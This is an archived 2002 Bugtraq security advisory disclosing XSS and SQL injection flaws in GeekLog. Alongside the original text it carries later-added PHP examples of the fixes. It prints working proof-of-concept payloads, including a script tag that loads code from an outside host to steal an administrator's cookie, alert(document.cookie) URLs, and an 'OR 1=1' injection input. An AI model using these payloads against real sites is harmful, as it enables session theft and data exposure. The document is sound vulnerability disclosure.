Bugtraq mailing list archives

[ARL02-A13] Multiple Security Issues in GeekLog


From: Ahmet Sabri ALPER <s_alper () hotmail com>
Date: 10 Jun 2002 11:41:43 -0000



+/--------\-------- ALPER Research Labs ------/--------/+
+/---------\-------  Security Advisory  -----/---------/+
+/----------\------    ID: ARL02-A13    ----/----------/+
+/-----------\----- salper () olympos org  ---/-----------/+


Advisory Information
--------------------
Name               : Multiple Security Issues in GeekLog
Software Package   : GeekLog
Vendor Homepage    : http://geeklog.sourceforge.net/
Vulnerable Versions: v1.3.5, v1.3.5rc1 and older
Platforms          : OS Independent, PHP
Vulnerability Type : Input Validation Error
Vendor Contacted   : 31/05/2002
Vendor Replied     : 01/06/2002
Prior Problems     : N/A
Current Version    : v1.3.5rc1 (vulnerable)


Summary
-------
GeekLog is a web content management system suitable for 
running full-featured community sites. It supports article 
posting, threaded comments, event scheduling, and link 
management and is built around a design philosophy that 
emphasizes ease of use.

I have found these issues while testing the GeekLog system 
which was to be used at http://www.olympos.org, "Olympos 
Turkish Security Portal".
Two different types of Cross-Site Scripting issue, plus one SQL injection 
vulnerability, were found in GeekLog.


Details
-------
1. When any user submits a new Calendar Event, the form is sent 
to the site admin for approval. The $url variable, which holds the 
data given in the "Link" section of the form, is not filtered for 
malicious code, so a malicious user may obtain the cookie of the site 
administrator and thereby "own" the site.
This issue may also be exploited to run malicious script code on the 
GeekLog site.
Proof-of-concept Link input ($url):
<script src="http://forum.olympos.org/f.js";>Alper</script>

2. Maliciously crafted links from third-party sites may allow Cross-Site 
Scripting attacks via "index.php" and/or "comment.php". 
Two examples of this:
/index.php?topic=<script>alert(document.cookie)</script>
/comment.php?mode=display&sid=foo&pid=18&title=<script>alert(document.cookie)</script>&type=article
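Both XSS issues above come down to the same two sinks: a user-supplied link ($url, issue 1) that ends up inside an href attribute, and query-string values ($topic, $title, issue 2) that are echoed into the page body. The following is an added example written for this advisory, not GeekLog's own code; the function names are invented and the sample inputs are constructed to mirror the shape of the proof-of-concept values. It uses current PHP (7.1 or later) rather than the PHP 4 of the era.

```php
<?php
// Added example (not GeekLog code): hardening the two XSS sinks from issues 1 and 2.
// All function names here are assumptions; GeekLog's real helpers are not shown.

// Context A: a user-supplied link ($url from the calendar event form) that will be
// placed into an href attribute. Entity-escaping alone is not enough for an href,
// because a "javascript:" URL contains nothing htmlspecialchars() would touch,
// so the scheme is whitelisted first.
function safe_link_href(string $url): ?string
{
    $url = trim($url);
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;                       // relative, malformed or scheme-less: reject
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;                       // javascript:, data:, vbscript:, ...
    }
    // Quote-safe for use inside a double-quoted attribute.
    return htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Context B: a value such as $topic or $title from the query string that is
// echoed back into the page body (issue 2). Here entity encoding is the fix.
function esc_html(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Vulnerable pattern, as the advisory describes it (do not use):
//   echo '<a href="' . $url . '">' . $title . '</a>';
// Hardened rendering: validate the URL, escape the text, drop the link if invalid.
function render_event_link(string $url, string $title): string
{
    $href = safe_link_href($url);
    if ($href === null) {
        return esc_html($title);           // keep the (escaped) text, lose the link
    }
    return '<a href="' . $href . '">' . esc_html($title) . '</a>';
}

// Constructed sample inputs modelled on the advisory's proof-of-concept shapes.
$samples = [
    ['http://forum.olympos.org/', 'Olympos'],                                  // legitimate
    ['<script src="http://example.invalid/f.js">x</script>', 'evil'],          // issue 1 shape
    ['javascript:alert(document.cookie)', 'click me'],                         // scheme abuse
    ['http://example.invalid/?q=1', '<script>alert(document.cookie)</script>'], // issue 2 shape
];
foreach ($samples as [$url, $title]) {
    echo render_event_link($url, $title), "\n";
}
```

Only the first sample produces a working link; the second and third are rejected by the scheme check and rendered as plain text, and the fourth keeps its link but its title arrives in the page as `&lt;script&gt;...` rather than as markup. Validating the URL on the way in (at submission time, before it reaches the admin's approval screen) and escaping on the way out are complementary; the approval page is exactly where a stored payload in $url would otherwise execute with the administrator's session.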

3. The $pid variable is passed directly into an SQL query. This makes it 
possible for attackers to launch SQL injection attacks.
/comment.php?mode=display&sid=foo&pid=PROBLEM_HERE&title=ALPER_Research_Labs

As the "Magic Quotes" function of PHP escapes the quoting characters, 
this third issue might just cause "light" headaches, but if "Magic 
Quotes" is not active, the attacker may be able to obtain all the information 
about users from the SQL tables.
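A caveat worth making explicit on the Magic Quotes point: magic_quotes_gpc only backslash-escapes single quotes, double quotes, backslashes and NUL bytes, so it only helps when the tainted value sits inside a quoted SQL string literal. A comment id is numeric and is commonly interpolated unquoted, in which case Magic Quotes changes nothing. The following added example (not GeekLog code; how GeekLog actually built its query is not shown on this page, so the query shape and the "comments" table are constructed) shows the unquoted case and the fix that removes the dependency on PHP configuration entirely. It needs PHP with the pdo_sqlite extension.

```php
<?php
// Added example (not GeekLog code): handling comment.php's $pid safely.
// Uses an in-memory SQLite database so it runs on its own; the "comments"
// table and rows below are constructed, not GeekLog's real schema.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE comments (pid INTEGER, sid TEXT, comment TEXT)');
$db->exec("INSERT INTO comments VALUES (18, 'foo', 'first comment')");
$db->exec("INSERT INTO comments VALUES (19, 'bar', 'second comment')");

// Vulnerable pattern as the advisory describes it: $pid is concatenated straight
// into the query. Because the value is numeric and therefore unquoted in the SQL,
// magic_quotes_gpc (which only escapes ' " \ and NUL) does nothing for an input
// that contains no quote characters at all.
function fetch_comment_vulnerable(PDO $db, string $pid): array
{
    return $db->query("SELECT pid, comment FROM comments WHERE pid = $pid")
              ->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the parameter identifies a row, so it must be a non-negative integer.
// Reject anything else before it reaches SQL, then bind it as a typed parameter.
function fetch_comment_safe(PDO $db, string $pid): array
{
    if (!ctype_digit($pid)) {
        throw new InvalidArgumentException('pid must be a non-negative integer');
    }
    $stmt = $db->prepare('SELECT pid, comment FROM comments WHERE pid = :pid');
    $stmt->bindValue(':pid', (int) $pid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a legitimate value and a quote-free value of the kind the
// advisory's PROBLEM_HERE placeholder stands for.
$legit  = '18';
$tamper = '18 OR 1=1';

print_r(fetch_comment_vulnerable($db, $legit));    // one row
print_r(fetch_comment_vulnerable($db, $tamper));   // every row: no quotes, so no escaping helps

print_r(fetch_comment_safe($db, $legit));          // one row
try {
    fetch_comment_safe($db, $tamper);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";     // never reaches the database
}
```

The design point is that the fix is a type decision, not an escaping decision: once $pid is validated as an integer and bound as PDO::PARAM_INT, the query is correct regardless of whether Magic Quotes (or any other global escaping setting) is on.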


Solution
--------
The vendor replied and acted quickly.
A patch or a new version addressing these issues will
soon be available via CVS or FTP download from:
http://www.sourceforge.net/projects/geeklog
or
http://geeklog.sourceforge.net

The GeekLog development team said that they will also be 
cleaning up the code for security issues similar to those 
mentioned above.


Credits
-------
Discovered on 31 May 2002 by 
Ahmet Sabri ALPER <salper () olympos org>
ALPER Research Labs.

The ALPER Research Labs [ARL] workers are freelance 
security professionals and white-hat hackers. The ARL 
workers are available for hire for legal work.
ARL also supports the open-software community by detecting 
possible security issues in GPL or other publicly licensed 
products.


References
----------
Product Web Page: http://geeklog.sourceforge.net/
Olympos: http://www.olympos.org/

